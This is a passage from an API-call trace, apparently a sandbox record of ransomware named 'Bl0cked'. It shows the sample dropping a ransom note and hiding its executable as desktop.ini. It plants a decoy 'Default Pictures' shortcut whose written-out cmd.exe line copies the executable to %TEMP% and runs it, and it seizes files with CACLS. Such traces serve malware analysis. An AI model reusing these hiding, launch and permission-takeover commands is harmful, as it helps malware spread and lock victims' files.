lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\") returned 0x2d [0177.445] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0177.446] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0177.446] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xcc0, dwThreadId=0xac4)) returned 1 [0177.447] CloseHandle (hObject=0x1b4) returned 1 [0177.447] CloseHandle (hObject=0x120) returned 1 [0177.447] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\bl0cked-readme.rtf")) returned 0xffffffff [0177.448] GetLastError () returned 0x2 [0177.448] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0177.697] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\bl0cked-readme.rtf")) returned 0x2020 [0177.697] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0177.697] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0177.697] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0177.697] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0177.697] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0177.697] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0177.697] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0177.697] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\") returned 0x2d [0177.698] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0177.698] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0177.698] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1") returned 0x2c [0177.699] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x16e | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x16e [0177.699] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0177.699] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\"", lpProcessInformation=0x12fb78*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xb9c, dwThreadId=0xbb8)) returned 1 [0177.739] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0178.455] CloseHandle (hObject=0x120) returned 1 [0178.455] CloseHandle (hObject=0x1b4) returned 1 [0178.455] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0178.455] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0178.455] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0178.455] GetTickCount () returned 0x33a60 [0178.455] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=23524469706) returned 1 [0178.456] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="p\x1dﯸ\x12萀\x1d") returned 1 [0178.456] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="p\x1dﯸ\x12萀\x1d") returned 1 [0178.456] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="v\x1dﯸ\x12萀\x1d") returned 1 [0178.456] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="q\x1dﯸ\x12萀\x1d") returned 1 [0178.456] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="e\x1dﯸ\x12萀\x1d") returned 1 [0178.456] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="C\x1dﯸ\x12萀\x1d") returned 1 [0178.456] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="Q\x1dﯸ\x12萀\x1d") returned 1 [0178.456] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="J\x1dﯸ\x12萀\x1d") returned 1 [0178.456] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0178.456] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0178.456] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0178.456] CharUpperBuffW (in: lpsz="explorer.exe \"Default Pictures\" & type \"Default Pictures\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x71 | out: lpsz="EXPLORER.EXE \"DEFAULT PICTURES\" & TYPE \"DEFAULT PICTURES\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x71 [0178.456] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0178.456] CharUpperBuffW (in: lpsz="explorer.exe \"Default Pictures\" & type \"Default Pictures\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x72 | out: lpsz="EXPLORER.EXE \"DEFAULT PICTURES\" & TYPE \"DEFAULT PICTURES\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x72 [0178.456] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0178.456] CoInitialize (pvReserved=0x0) returned 0x0 [0178.456] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0178.457] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0178.457] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0178.457] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0178.460] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"Default Pictures\" & type \"Default Pictures\\desktop.ini\" > \"%TEMP%\\ppvqeCQJ.exe\" && \"%TEMP%\\ppvqeCQJ.exe\"") returned 0x0 [0178.460] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0178.460] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0178.460] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0178.460] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures.lnk", fRemember=0) returned 0x0 [0178.474] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0178.474] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0178.474] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0178.474] CoUninitialize () [0178.474] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0178.475] ReleaseMutex (hMutex=0xf8) returned 1 [0178.475] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0178.475] ReleaseMutex (hMutex=0xf8) returned 1 [0178.475] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0178.475] ReleaseMutex (hMutex=0xf8) returned 1 [0178.475] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0178.475] ReleaseMutex (hMutex=0xf8) returned 1 [0178.475] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile11.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.670] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp", lpFilePart=0x12eab4*="usertile11.bmp") returned 0x52 [0178.670] GetLastError () returned 0x5 [0178.670] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0178.670] LocalFree (hMem=0x1c6cc8) returned 0x0 [0178.670] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0178.670] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0178.670] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0178.671] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0178.671] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0178.671] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0178.671] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xa14, dwThreadId=0xc50)) returned 1 [0178.673] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0179.820] CloseHandle (hObject=0x1b4) returned 1 [0179.820] CloseHandle (hObject=0x120) returned 1 [0179.820] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0179.820] ReleaseMutex (hMutex=0xf8) returned 1 [0179.820] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0179.820] ReleaseMutex (hMutex=0xf8) returned 1 [0179.820] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0179.820] ReleaseMutex (hMutex=0xf8) returned 1 [0179.820] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0179.820] ReleaseMutex (hMutex=0xf8) returned 1 [0179.820] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile11.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.820] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp", lpFilePart=0x12eab4*="usertile11.bmp") returned 0x52 [0179.820] GetLastError () returned 0x5 [0179.820] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0179.820] LocalFree (hMem=0x1c6cc8) returned 0x0 [0179.820] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0179.820] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0179.821] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0179.821] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0179.821] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0179.821] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0179.821] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0179.821] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0179.821] ReleaseMutex (hMutex=0xf8) returned 1 [0179.821] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0179.821] ReleaseMutex (hMutex=0xf8) returned 1 [0179.821] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0179.821] ReleaseMutex (hMutex=0xf8) returned 1 [0179.821] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0179.821] ReleaseMutex (hMutex=0xf8) returned 1 [0179.821] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile12.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.821] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp", lpFilePart=0x12eab4*="usertile12.bmp") returned 0x52 [0179.821] GetLastError () returned 0x5 [0179.821] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0179.821] LocalFree (hMem=0x1c6cc8) returned 0x0 [0179.821] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0179.821] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0179.822] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0179.822] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0179.822] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0179.822] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0179.822] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x47c, dwThreadId=0xa24)) returned 1 [0179.827] WaitForSingleObject (hHandle=0x1b4, 